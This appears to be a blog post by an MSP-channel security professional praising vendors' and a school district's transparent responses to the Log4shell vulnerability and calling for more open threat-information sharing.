The cybersecurity landscape we all operate in is changing at an extremely rapid pace. We’ve just seen the most universal vulnerability we’ve seen in a long time. We’ve had years of data breach after data breach, concentrated supply chain attacks, major vulnerabilities, you name it. It creates a challenge for red teamers, blue teamers, and purple teamers alike. We’re all facing new challenges in how we respond to this new world of threats.
However, this post isn’t about defensive or offensive security, it’s about how our businesses respond to threats and incidents. For far too long, cybersecurity has been handcuffed by this “delta special ops force secret squirrel” approach. The emphasis on OpSec has been so intense that it’s taken away from the ability to contribute to the broader cyber community. If we can’t help each other, we’ll never win. We need to strike the right balance of OpSec and information sharing. Government does this better than you might perceive, just look at CISA.
Now before I keep going. I’m not advocating that we need to share all the details every time we have a problem. I’m simply saying that we need to be transparent about vulnerability, attacks, IOCs, TTPs and the like. In the channel, there’s an even greater calling to be transparent. We need our downstream consumer (whether it’s a partner or their customer) to be aware of the threat and how it’s being handled. After all, being left in the dark is worse than hearing bad news.
Believe it or not, this isn’t a doom and gloom post. I was inspired to write this because of new transparency I’ve seen that I haven’t before. And that’s good news, we’re actually seeing progress on this front. It’s worth noting that I’m not talking about critical sector sharing programs like InfraGard. I’m talking about slam dunk, here’s what we know, full on public transparency.
It started with Log4shell. A perfect 10 CVE, pushing itself right into our holiday plans. Impacting virtually everything Java. Holy shit, what a vuln right?! It’s a nightmare, our own team reacted extremely fast to it (YAY) and we also saw quick action from a number of channel vendors. I want to call a couple out here for kudos.
ConnectWise did an incredible job responding to and sharing information about Log4shell. Admittedly, there was a time I wasn’t impressed with the way they handled cyber. But, they listened, iterated, and improved. And after all, that’s all we ask for. They were very quick to share what they knew and what the plan was, and quickfire with the follow up.
Datto’s contribution was different, but important! They launched a Log4shell detection tool that empowers partners at scale.
Huntress is the gold standard of jumping into cyber calamity to help! They worked with folks like Jason Slagle and released a whole new testing tool in hours. Now anyone can test their servers to see if they’re vulnerable to Log4shell.
This is one of my shameless plug moments of course. But I sincerely mean it when I say Pax8 did a kickass job on this. Before most had finished their coffee our Security Ops and Engineering teams were assessing and fixing the issue, checking for compromise, getting ready to push new codebase, all of it. Subsequently we released a statement to put folks at ease, it was rapid fire effective action.
Those are just a few examples, and there are others out there I’m sure. My point is that we didn’t used to see this. My hope is that we continue on this momentum and we keep talking openly an honestly. If you’re a ConnectWise partner, surely you were put a little at east when you could be comfortable in the fact that they were looking into things, right? When you get more info, you can turn it into action and do what you need to do to protect your downstream clients.
This is the kind of transparency we need in cybersecurity, especially to the public. We need to be prompt and thoughtful. We need to come out and say hey this is potentially impacting us, we’re investigating it. Then, as we learn more, we need to share what will be meaningful to our business audience. With that in mind, I want to share a non-channel example that impacted me personally.
My Local School District
My kiddos are in Jeffco Public Schools, and they have a number of java-based apps. In response to this vulnerability, their tech team made the difficult, but I feel very important decision to pull things down. This is a critical step that should be awarded and praised! In fact, they even made the decision to impact next year’s enrollments to ensure student and user privacy. This is huge, and I’m thankful they did it! It shows transparency from an industry that usually isn’t very transparent!
I wanted to share how happy I am to see that we’re improving transparency in the security space. It’s a must, and this progress needs to be kept up. Hopefully we’ll see even more of it next time. I hope to see this expand into broader sharing of threat data, better community vulnerability management, and more open communication to the general public. This type of transparency rises the tide in security but it also exposes the real cyber world to the general public in a way that will, hopefully, make them better understand the challenges we all face as cybersecurity practitioners.